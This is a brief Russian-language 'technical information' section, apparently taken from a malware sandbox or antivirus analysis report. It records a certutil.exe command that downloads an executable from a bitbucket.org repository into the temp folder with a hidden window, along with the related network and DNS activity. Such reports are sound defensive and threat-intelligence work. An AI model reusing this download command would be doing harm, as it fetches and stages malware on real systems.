Техническая информация
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://bitbucket.org/cryptexxx/files/downloads/51GjW1HC.exe %TEMP%\filename2.exe
- 'bi###cket.org':443
- DNS ASK bi###cket.org
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://bitbucket.org/cryptexxx/files/downloads/51GjW1HC.exe %TEMP%\filename2.exe' (со скрытым окном)